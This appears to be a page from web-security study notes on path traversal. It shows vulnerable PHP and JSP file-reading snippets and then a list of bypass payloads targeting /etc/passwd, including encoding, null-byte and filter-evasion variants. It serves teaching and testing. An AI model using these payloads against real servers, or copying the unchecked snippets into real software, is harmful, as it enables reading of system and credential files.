Path Traversal

Path traversl or directory traversal is an attack which allows an attacker to read aribitary files on the server that is running an application. Path traversal allows an attacker to read:

Sensative operating system files
Application code and data
Credentials for backend systems

Vulnerable code snippets

PHP

$file = $_GET['file'];
if(file_exists('/var/www/html/'.$file)) {
		readfile('/var/www/html/'. $file);
	}

JSP

String file = request.getParameter("file");
FileInputStream f = new FileInputStream("/var/www/"+file);
byte[]data = new byte[f.available()];
f.read(data);
f.close();
response.getOutputStream().write(data);

Techniques

Direct: /etc/passwd
Traversing: ../../../../../etc/passwd
If ../ is escaped: ....//....//....//....//
URL encoding: %2e%2e%2f
Double url encoding: %252e%252e%252f
Start path is validated and must start with expected base folder: /var/www/html/images/../../../../etc/passwd
File extension validated? use null byte: ../../../../../etc/passwd%00.png

Note: In case of node js applications may instances of traversal can occur directly by appending traversal sequence to some directory eg:

https://example.com/file/static/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

PreviousBlind SQL Injection NextAttacking Authentication

Last updated 1 year ago

hashtagVulnerable code snippets

hashtagPHP

hashtagJSP

hashtagTechniques

Vulnerable code snippets

PHP

JSP

Techniques